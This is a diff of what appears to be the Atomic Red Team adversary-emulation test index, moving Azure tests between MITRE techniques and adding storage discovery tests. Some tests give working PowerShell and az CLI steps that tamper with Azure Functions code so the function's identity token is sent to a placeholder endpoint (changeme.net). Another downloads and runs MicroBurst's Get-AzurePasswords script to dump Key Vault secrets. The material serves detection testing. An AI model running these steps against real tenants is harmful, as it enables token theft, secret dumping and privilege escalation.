-        to T1550.001 \"Azure - Functions code upload - Functions code injection to
-        retrieve the Functions identity access token\", the depicted code injection
-        scenario tampers the source code of Azure Functions to perform Subscription
-        Privilege Escalation by retrieving the identity access token of an Azure functions
-        instance. In this case, the prepared zip file (underlying package for a Function)
-        is expected to contain the tampered function presented in src/code_to_insert.py.
-        Note that the endpoint https://changeme.net needs to be adapted in your packed
-        function code.\n\nNote:\n- The Azure Function modified in this test must be
-        hosted via Azure Blob storage (Info on storage considerations for Azure Function:
-        https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
-        \n- For Function code upload to Azure Functions that are hosted via Azure
-        Files in a File Share, refer to T1550.001 \"Azure - Functions code upload
-        - Functions code injection to retrieve the Functions identity access token\".\n-
-        The required input fields can be retrieved in a reconnaissance step in test
-        T1619 \"Azure - Enumerate Storage Account Objects via Key-based authentication
-        using Azure CLI\". The code of function apps may be inspected and prepared
-        from the result of test T1530 \"Azure - Dump Azure Storage Account Objects
-        via Azure CLI\".\n\nRequirements:\n- The test is intended to be executed in
-        interactive mode (with -Interactive parameter) in order to complete the az
-        login command when MFA is required.\n- The EntraID user must have the role
-        \"Storage Account Contributor\", or a role with similar permissions."
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        storage_account_name:
-          type: string
-          default: storage_account_name_example
-          description: Name of storage account that is related to the Function
-        container_name:
-          type: string
-          default: container_name_example
-          description: Name of the container that contains the function blob
-        blob_name:
-          type: string
-          default: blob_example
-          description: Name of the function blob
-        file_path_blob:
-          type: path
-          default: "$env:temp/T1550.001_function_code.zip"
-          description: Path to the function code file to upload as blob
-      dependency_executor_name: powershell
-      dependencies:
-      - description: Azure CLI must be installed
-        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-        get_prereq_command: Install-Module -Name Az -Force
-      executor:
-        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
-          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
-          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
-          be true or null\n    Write-Output \"Shared key access is disabled for this
-          storage account.\"\n} else {    \n    $connectionString = az storage account
-          show-connection-string --name \"#{storage_account_name}\" --query connectionString
-          --output tsv\n\n    # Download blob for cleanup\n    $tmpOriginalFunctionCode
-          = Join-Path $env:temp/ (\"T1550.001_tmp_original_\" + \"#{blob_name}\")\n
-          \   az storage blob download --connection-string $connectionString --container-name
-          \"#{container_name}\" --name \"#{blob_name}\" --file $tmpOriginalFunctionCode
-          --overwrite true\n\n    if ($LASTEXITCODE -eq 0) {\n        # Upload new
-          blob version if download of existing blob succeeded\n        az storage
-          blob upload --connection-string $connectionString --container-name \"#{container_name}\"
-          --name \"#{blob_name}\" --file \"#{file_path_blob}\" --overwrite true\n
-          \   } else {\n        Write-Output \"Download original function code failed.\"\n
-          \       exit 1\n    }\n}\n"
-        cleanup_command: |-
-          az login    # Log in to Azure CLI
-
-          # Upload previous funciton code
-          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + "#{blob_name}")
-          az storage blob upload --account-name "#{storage_account_name}" --container-name "#{container_name}" --file $tmpOriginalFunctionCode --name "#{blob_name}" --overwrite true 2>$null
-
-          if ($LASTEXITCODE -eq 0) {
-              Write-Output "Uploaded original version of function code."
-
-              # Delete tmp original blob file if upload succeeded
-              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-              Write-Output "Deleted tmp original blob file: $($tmpOriginalFunctionCode)"
-          } else {
-              Write-Output "Upload original function code failed."
-          }
-        name: powershell
-        elevation_required: false
-    - name: Azure - Functions code upload - Functions code injection via File Share
-        modification to retrieve the Functions identity access token
-      auto_generated_guid: 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1
-      description: "This test injects code into an Azure Function (RCE) to perform
-        Subscription Privilege Escalation by retrieving the identity access token
-        of an Azure functions instance.\n\nAttack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nOnce
-        executed, the \"https://changeme\" will retrieve the access token when the
-        function app is executed on behalf of the tenant. The function may be triggered
-        manually from authorized people, triggered in regular intervals, or in various
-        other ways. The access token can then be used to perform further attack steps
-        with the permissions that the function app holds (e.g. listening virtual machines).\n\nNote:
-        \n- The Azure Function modified in this test must be hosted via Azure Files
-        in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).\n-
-        For Function code upload to Azure Functions that are hosted via Azure Blob
-        storage, refer to T1550.001 \"Azure - Functions code upload - Functions code
-        injection via Blob upload\".\n- The required input fields can be retrieved
-        in a reconnaissance step in test T1619 \"Azure - Enumerate Storage Account
-        Objects via Key-based authentication using Azure CLI\". The code of function
-        apps may be inspected and prepared from the result of test T1530 \"Azure -
-        Dump Azure Storage Account Objects via Azure CLI\".\n- Important: Change the
-        https://changeme.net in code_to_insert_path to a self-controlled endpoint.
-        This endpoint can be hosted e.g. as request bin via Pipedream to display the
-        body of incoming POST requests.\n- The default injected code to retrieve the
-        access token can be replaced by arbitrary other code. In this case: Replace
-        the code defined in code_to_insert_path\n\nRequirements:\n- The test is intended
-        to be executed in interactive mode (with -Interactive parameter) in order
-        to complete the az login command when MFA is required.\n- The EntraID user
-        must have the role \"Storage Account Contributor\", or a role with similar
-        permissions.\n\nExecution options: Defined by the input field execution_option\n-
-        insert_code: This option (1) downloads the existing funciton code into a tmp
-        file, (2) injects the code from code_to_insert_path at the beginning of the
-        file, and (3) uploads the tampered file to the targeted Azure Function code
-        (Azure File Share File).\n- replace_file: This option uploads the function
-        code defined in code_to_insert_path to the targeted Azure Function code (Azure
-        File Share File)."
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        storage_account_name:
-          type: string
-          default: storage_account_name_example
-          description: Name of storage account that is related to the Function
-        execution_option:
-          type: string
-          default: insert_code
-          description: Chooses execution option insert_code, or replace_file
-        file_share_name:
-          type: string
-          default: file_share_name_example
-          description: Name of the file share that is related to the Function
-        file_path:
-          type: path
-          default: site/wwwroot/function_app.py
-          description: Path to the Function file in the file share
-        code_to_insert_path:
-          type: path
-          default: "$PathToAtomicsFolder/T1550.001/src/code_to_insert.py"
-          description: The code that will be injected into the Function
-      dependency_executor_name: powershell
-      dependencies:
-      - description: Azure CLI must be installed
-        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-        get_prereq_command: Install-Module -Name Az -Force
-      executor:
-        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
-          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
-          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
-          be true or null\n    Write-Output \"Shared key access is disabled for this
-          storage account.\"\n} else {\n    # Download file for cleanup\n    $tmpOriginalFileName
-          = [System.IO.Path]::GetFileName(\"#{file_path}\")\n    $tmpOriginalFunctionCode
-          = Join-Path $env:temp/ (\"T1550.001_tmp_original_\" + $tmpOriginalFileName)\n
-          \   az storage file download --account-name \"#{storage_account_name}\"
-          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors
-          --dest $tmpOriginalFunctionCode\n\n    if ($LASTEXITCODE -eq 0) {\n        #
-          Upload new funciton code if download of existing code succeeded\n        if
-          (\"#{execution_option}\" -eq \"insert_code\") {\n            # Download
-          file from file share for injection\n            $tmpFunctionCode = Join-Path
-          $env:temp/ (\"T1550.001_tmp_to_inject_\" + $tmpOriginalFileName)\n            az
-          storage file download --account-name \"#{storage_account_name}\" --share-name
-          \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors --dest $tmpFunctionCode\n
-          \           \n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
-          \"Function code download failed.\"\n                exit 1\n            }\n
-          \           Write-Output \"File downloaded: $($tmpFunctionCode)\"\n            \n
-          \           $insertContent = Get-Content -Path \"#{code_to_insert_path}\"
-          -Raw  # Load the content of the insert file\n            \n            $content
-          = Get-Content -Path $tmpFunctionCode -Raw  # Inject code to file\n            $content
-          = $insertContent + \"`n\" + $content     # Insert the new code at the beginning\n
-          \           $content | Set-Content -Path $tmpFunctionCode       # Write
-          the modified content to the file\n            \n            # Upload file
-          to file share\n            az storage file upload --account-name \"#{storage_account_name}\"
-          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --source $tmpFunctionCode
-          --only-show-errors\n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
-          \"Function code upload failed.\"\n                exit 1\n            }\n
-          \           Write-Output \"Uploaded the tampered file\"\n        } elseif
-          (\"#{execution_option}\" -eq \"replace_file\") {\n            az storage
-          file upload --account-name \"#{storage_account_name}\" --share-name \"#{file_share_name}\"
-          -p \"#{file_path}\" --source \"#{code_to_insert_path}\" --only-show-errors\n
-          \           if ($LASTEXITCODE -ne 0) {\n                Write-Output \"Function
-          code upload failed.\"\n                exit 1\n            }\n            Write-Output
-          \"Uploaded the tampered file\"\n        } else {\n            Write-Output
-          \"Please choose a valid execution_option\"\n            exit 1\n        }\n
-          \   } else {\n        Write-Output \"Download original function code failed.\"\n
-          \       exit 1\n    }\n}"
-        cleanup_command: |-
-          az login    # Log in to Azure CLI
-
-          # Upload previous funciton code
-          $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
-          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + $tmpOriginalFileName)
-          az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpOriginalFunctionCode --only-show-errors 2>$null
-
-          if ($LASTEXITCODE -eq 0) {
-              Write-Output "Uploaded original version of function code."
-
-              # Delete tmp original f file if upload succeeded
-              if ("#{execution_option}" -eq "insert_code") {
-                  $tmpFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_to_inject_" + $tmpOriginalFileName)
-                  Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue
-                  Write-Output "Deleted tmp file: $($tmpFunctionCode)"
-              }
-
-              # Delete tmp original file
-              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-              Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)"
-          } else {
-              Write-Output "Upload original function code failed."
-          }
-        name: powershell
-        elevation_required: false
+    atomic_tests: []
 credential-access:
  T1557:
    technique:
@@ -48780,75 +48256,220 @@ credential-access:
      - 'User Account: User Account Modification'
      identifier: T1528
    atomic_tests:
-    - name: Azure - Dump All Azure Key Vaults with Microburst
-      auto_generated_guid: 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea
-      description: |-
-        Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file.
-        See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/
+    - name: Azure - Functions code upload - Functions code injection via Blob upload
+      auto_generated_guid: 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43
+      description: "This test injects code into an Azure Function (RCE).\n\nAttack
+        idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nSimilar
+        to T1528 \"Azure - Functions code upload - Functions code injection to retrieve
+        the Functions identity access token\", the depicted code injection scenario
+        tampers the source code of Azure Functions to perform Subscription Privilege
+        Escalation by retrieving the identity access token of an Azure functions instance.
+        In this case, the prepared zip file (underlying package for a Function) is
+        expected to contain the tampered function presented in src/code_to_insert.py.
+        Note that the endpoint https://changeme.net needs to be adapted in your packed
+        function code.\n\nNote:\n- The Azure Function modified in this test must be
+        hosted via Azure Blob storage (Info on storage considerations for Azure Function:
+        https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
+        \n- For Function code upload to Azure Functions that are hosted via Azure
+        Files in a File Share, refer to T1528 \"Azure - Functions code upload - Functions
+        code injection to retrieve the Functions identity access token\".\n- The required
+        input fields can be retrieved in a reconnaissance step in test T1619 \"Azure
+        - Enumerate Storage Account Objects via Key-based authentication using Azure
+        CLI\". The code of function apps may be inspected and prepared from the result
+        of test T1530 \"Azure - Dump Azure Storage Account Objects via Azure CLI\".\n\nRequirements:\n-
+        The test is intended to be executed in interactive mode (with -Interactive
+        parameter) in order to complete the az login command when MFA is required.\n-
+        The EntraID user must have the role \"Storage Account Contributor\", or a
+        role with similar permissions."
      supported_platforms:
      - iaas:azure
      input_arguments:
-        username:
-          description: Azure AD username
+        storage_account_name:
          type: string
-          default:
-        password:
-          description: Azure AD password
+          default: storage_account_name_example
+          description: Name of storage account that is related to the Function
+        container_name:
          type: string
-          default: T1082Az
-        output_file:
-          description: File to dump results to
+          default: container_name_example
+          description: Name of the container that contains the function blob
+        blob_name:
          type: string
-          default: "$env:temp\\T1528Test1.txt"
-        subscription_id:
-          description: Azure subscription id to search
-          type: string
-          default:
+          default: blob_example
+          description: Name of the function blob
+        file_path_blob:
+          type: path
+          default: "$env:temp/T1528_function_code.zip"
+          description: Path to the function code file to upload as blob
      dependency_executor_name: powershell
      dependencies:
-      - description: 'The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
-
-          '
-        prereq_command: 'if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"){exit
-          0} else {exit 1}
-
-          '
-        get_prereq_command: |
-          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-          invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
-      - description: 'The Azure RM module must be installed.
-
-          '
-        prereq_command: 'try {if (Get-InstalledModule -Name AzureRM -ErrorAction SilentlyContinue)
+      - description: Azure CLI must be installed
+        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
          {exit 0} else {exit 1}} catch {exit 1}
-
-          '
-        get_prereq_command: 'Install-Module -Name AzureRM -Force -allowclobber
-
-          '
-      - description: 'The Azure module must be installed.
-
-          '
-        prereq_command: 'try {if (Get-InstalledModule -Name Azure -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-
-          '
-        get_prereq_command: 'Install-Module -Name Azure -Force -allowclobber
-
-          '
+        get_prereq_command: Install-Module -Name Az -Force
      executor:
-        command: |
-          import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
-          $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
-          Connect-AzureRmAccount -Credential $Credential
-          Get-AzurePasswords -subscription '#{subscription_id}' > #{output_file}
-          cat #{output_file}
-        cleanup_command: 'remove-item #{output_file} -force -erroraction silentlycontinue
+        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
+          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
+          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
+          be true or null\n    Write-Output \"Shared key access is disabled for this
+          storage account.\"\n} else {    \n    $connectionString = az storage account
+          show-connection-string --name \"#{storage_account_name}\" --query connectionString
+          --output tsv\n\n    # Download blob for cleanup\n    $tmpOriginalFunctionCode
+          = Join-Path $env:temp/ (\"T1528_tmp_original_\" + \"#{blob_name}\")\n    az
+          storage blob download --connection-string $connectionString --container-name
+          \"#{container_name}\" --name \"#{blob_name}\" --file $tmpOriginalFunctionCode
+          --overwrite true\n\n    if ($LASTEXITCODE -eq 0) {\n        # Upload new
+          blob version if download of existing blob succeeded\n        az storage
+          blob upload --connection-string $connectionString --container-name \"#{container_name}\"
+          --name \"#{blob_name}\" --file \"#{file_path_blob}\" --overwrite true\n
+          \   } else {\n        Write-Output \"Download original function code failed.\"\n
+          \       exit 1\n    }\n}\n"
+        cleanup_command: |-
+          az login    # Log in to Azure CLI

-          '
+          # Upload previous funciton code
+          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + "#{blob_name}")
+          az storage blob upload --account-name "#{storage_account_name}" --container-name "#{container_name}" --file $tmpOriginalFunctionCode --name "#{blob_name}" --overwrite true 2>$null
+
+          if ($LASTEXITCODE -eq 0) {
+              Write-Output "Uploaded original version of function code."
+
+              # Delete tmp original blob file if upload succeeded
+              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
+              Write-Output "Deleted tmp original blob file: $($tmpOriginalFunctionCode)"
+          } else {
+              Write-Output "Upload original function code failed."
+          }
        name: powershell
-        elevation_required: true
+        elevation_required: false
+    - name: Azure - Functions code upload - Functions code injection via File Share
+        modification to retrieve the Functions identity access token
+      auto_generated_guid: 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1
+      description: "This test injects code into an Azure Function (RCE) to perform
+        Subscription Privilege Escalation by retrieving the identity access token
+        of an Azure functions instance.\n\nAttack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nOnce
+        executed, the \"https://changeme\" will retrieve the access token when the
+        function app is executed on behalf of the tenant. The function may be triggered
+        manually from authorized people, triggered in regular intervals, or in various
+        other ways. The access token can then be used to perform further attack steps
+        with the permissions that the function app holds (e.g. listening virtual machines).\n\nNote:
+        \n- The Azure Function modified in this test must be hosted via Azure Files
+        in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).\n-
+        For Function code upload to Azure Functions that are hosted via Azure Blob
+        storage, refer to T1528 \"Azure - Functions code upload - Functions code injection
+        via Blob upload\".\n- The required input fields can be retrieved in a reconnaissance
+        step in test T1619 \"Azure - Enumerate Storage Account Objects via Key-based
+        authentication using Azure CLI\". The code of function apps may be inspected
+        and prepared from the result of test T1530 \"Azure - Dump Azure Storage Account
+        Objects via Azure CLI\".\n- Important: Change the https://changeme.net in
+        code_to_insert_path to a self-controlled endpoint. This endpoint can be hosted
+        e.g. as request bin via Pipedream to display the body of incoming POST requests.\n-
+        The default injected code to retrieve the access token can be replaced by
+        arbitrary other code. In this case: Replace the code defined in code_to_insert_path\n\nRequirements:\n-
+        The test is intended to be executed in interactive mode (with -Interactive
+        parameter) in order to complete the az login command when MFA is required.\n-
+        The EntraID user must have the role \"Storage Account Contributor\", or a
+        role with similar permissions.\n\nExecution options: Defined by the input
+        field execution_option\n- insert_code: This option (1) downloads the existing
+        funciton code into a tmp file, (2) injects the code from code_to_insert_path
+        at the beginning of the file, and (3) uploads the tampered file to the targeted
+        Azure Function code (Azure File Share File).\n- replace_file: This option
+        uploads the function code defined in code_to_insert_path to the targeted Azure
+        Function code (Azure File Share File)."
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        storage_account_name:
+          type: string
+          default: storage_account_name_example
+          description: Name of storage account that is related to the Function
+        execution_option:
+          type: string
+          default: insert_code
+          description: Chooses execution option insert_code, or replace_file
+        file_share_name:
+          type: string
+          default: file_share_name_example
+          description: Name of the file share that is related to the Function
+        file_path:
+          type: path
+          default: site/wwwroot/function_app.py
+          description: Path to the Function file in the file share
+        code_to_insert_path:
+          type: path
+          default: "$PathToAtomicsFolder/T1528/src/code_to_insert.py"
+          description: The code that will be injected into the Function
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Azure CLI must be installed
+        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+        get_prereq_command: Install-Module -Name Az -Force
+      executor:
+        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
+          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
+          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
+          be true or null\n    Write-Output \"Shared key access is disabled for this
+          storage account.\"\n} else {\n    # Download file for cleanup\n    $tmpOriginalFileName
+          = [System.IO.Path]::GetFileName(\"#{file_path}\")\n    $tmpOriginalFunctionCode
+          = Join-Path $env:temp/ (\"T1528_tmp_original_\" + $tmpOriginalFileName)\n
+          \   az storage file download --account-name \"#{storage_account_name}\"
+          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors
+          --dest $tmpOriginalFunctionCode\n\n    if ($LASTEXITCODE -eq 0) {\n        #
+          Upload new funciton code if download of existing code succeeded\n        if
+          (\"#{execution_option}\" -eq \"insert_code\") {\n            # Download
+          file from file share for injection\n            $tmpFunctionCode = Join-Path
+          $env:temp/ (\"T1528_tmp_to_inject_\" + $tmpOriginalFileName)\n            az
+          storage file download --account-name \"#{storage_account_name}\" --share-name
+          \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors --dest $tmpFunctionCode\n
+          \           \n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
+          \"Function code download failed.\"\n                exit 1\n            }\n
+          \           Write-Output \"File downloaded: $($tmpFunctionCode)\"\n            \n
+          \           $insertContent = Get-Content -Path \"#{code_to_insert_path}\"
+          -Raw  # Load the content of the insert file\n            \n            $content
+          = Get-Content -Path $tmpFunctionCode -Raw  # Inject code to file\n            $content
+          = $insertContent + \"`n\" + $content     # Insert the new code at the beginning\n
+          \           $content | Set-Content -Path $tmpFunctionCode       # Write
+          the modified content to the file\n            \n            # Upload file
+          to file share\n            az storage file upload --account-name \"#{storage_account_name}\"
+          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --source $tmpFunctionCode
+          --only-show-errors\n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
+          \"Function code upload failed.\"\n                exit 1\n            }\n
+          \           Write-Output \"Uploaded the tampered file\"\n        } elseif
+          (\"#{execution_option}\" -eq \"replace_file\") {\n            az storage
+          file upload --account-name \"#{storage_account_name}\" --share-name \"#{file_share_name}\"
+          -p \"#{file_path}\" --source \"#{code_to_insert_path}\" --only-show-errors\n
+          \           if ($LASTEXITCODE -ne 0) {\n                Write-Output \"Function
+          code upload failed.\"\n                exit 1\n            }\n            Write-Output
+          \"Uploaded the tampered file\"\n        } else {\n            Write-Output
+          \"Please choose a valid execution_option\"\n            exit 1\n        }\n
+          \   } else {\n        Write-Output \"Download original function code failed.\"\n
+          \       exit 1\n    }\n}"
+        cleanup_command: |-
+          az login    # Log in to Azure CLI
+
+          # Upload previous funciton code
+          $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
+          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + $tmpOriginalFileName)
+          az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpOriginalFunctionCode --only-show-errors 2>$null
+
+          if ($LASTEXITCODE -eq 0) {
+              Write-Output "Uploaded original version of function code."
+
+              # Delete tmp original f file if upload succeeded
+              if ("#{execution_option}" -eq "insert_code") {
+                  $tmpFunctionCode = Join-Path $env:temp/ ("T1528_tmp_to_inject_" + $tmpOriginalFileName)
+                  Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue
+                  Write-Output "Deleted tmp file: $($tmpFunctionCode)"
+              }
+
+              # Delete tmp original file
+              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
+              Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)"
+          } else {
+              Write-Output "Upload original function code failed."
+          }
+        name: powershell
+        elevation_required: false
  T1552.006:
    technique:
      type: attack-pattern
@@ -49899,7 +49520,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -49935,7 +49556,77 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
-    atomic_tests: []
+      identifier: T1555.006
+    atomic_tests:
+    - name: Azure - Dump All Azure Key Vaults with Microburst
+      auto_generated_guid: 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea
+      description: |-
+        Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file.
+        See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure AD username
+          type: string
+          default:
+        password:
+          description: Azure AD password
+          type: string
+          default: T1082Az
+        output_file:
+          description: File to dump results to
+          type: string
+          default: "$env:temp\\T1528Test1.txt"
+        subscription_id:
+          description: Azure subscription id to search
+          type: string
+          default:
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
+
+          '
+        prereq_command: 'if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"){exit
+          0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
+      - description: 'The Azure RM module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name AzureRM -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name AzureRM -Force -allowclobber
+
+          '
+      - description: 'The Azure module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Azure -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Azure -Force -allowclobber
+
+          '
+      executor:
+        command: |
+          import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
+          $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
+          Connect-AzureRmAccount -Credential $Credential
+          Get-AzurePasswords -subscription '#{subscription_id}' > #{output_file}
+          cat #{output_file}
+        cleanup_command: 'remove-item #{output_file} -force -erroraction silentlycontinue
+
+          '
+        name: powershell
+        elevation_required: true
  T1003.008:
    technique:
      type: attack-pattern
@@ -53066,6 +52757,99 @@ discovery:
          Write-Output "Removed #{output_file}"
        name: powershell
        elevation_required: false
+    - name: Azure - Scan for Anonymous Access to Azure Storage (Powershell)
+      auto_generated_guid: 146af1f1-b74e-4aa7-9895-505eb559b4b0
+      description: "Upon successful execution, this test will test for anonymous access
+        to Azure storage containers by invoking a web request and outputting the results
+        to a file. \nThe corresponding response could then be interpreted to determine
+        whether or not the resource/container exists, as well as other information.
+        \nSee https://ninocrudele.com/the-three-most-effective-and-dangerous-cyberattacks-to-azure-and-countermeasures-part-2-attack-the-azure-storage-service
+        \    \n"
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        base_name:
+          description: Azure storage account name to test
+          type: string
+          default: T1619Test2
+        output_file:
+          description: File to output results to
+          type: string
+          default: "$env:temp\\T1619Test2.txt"
+        container_name:
+          description: Container name to search for (optional)
+          type: string
+          default:
+        blob_name:
+          description: Blob name to search for (optional)
+          type: string
+          default:
+      executor:
+        command: |
+          try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
+          catch [system.net.webexception]
+          {if($_.Exception.Response -ne $null)
+          {$Response = $_.Exception.Response.GetResponseStream()
+          $ReadResponse = New-Object System.IO.StreamReader($Response)
+          $ReadResponse.BaseStream.Position = 0
+          $responseBody = $ReadResponse.ReadToEnd()}
+          else {$responseBody = "The storage account could not be anonymously accessed."}}
+          "Response received for #{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}: $responsebody" | out-file -filepath #{output_file} -append
+        cleanup_command: 'remove-item #{output_file} -erroraction silentlycontinue
+
+          '
+        name: powershell
+    - name: Azure - Enumerate Azure Blobs with MicroBurst
+      auto_generated_guid: 3dab4bcc-667f-4459-aea7-4162dd2d6590
+      description: "Upon successful execution, this test will utilize a wordlist to
+        enumerate the public facing containers and blobs of a specified Azure storage
+        account. \nSee https://www.netspi.com/blog/technical/cloud-penetration-testing/anonymously-enumerating-azure-file-resources/
+        . \n"
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        base:
+          description: Azure blob keyword to enumerate (Example, storage account name)
+          type: string
+          default: secure
+        output_file:
+          description: File to output results to
+          type: string
+          default: "$env:temp\\T1619Test1.txt"
+        wordlist:
+          description: File path to keywords for search permutations
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\permutations.txt
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The Invoke-EnumerateAzureBlobs module must exist in PathToAtomicsFolder\..\ExternalPayloads.
+
+          '
+        prereq_command: 'if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"){exit
+          0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
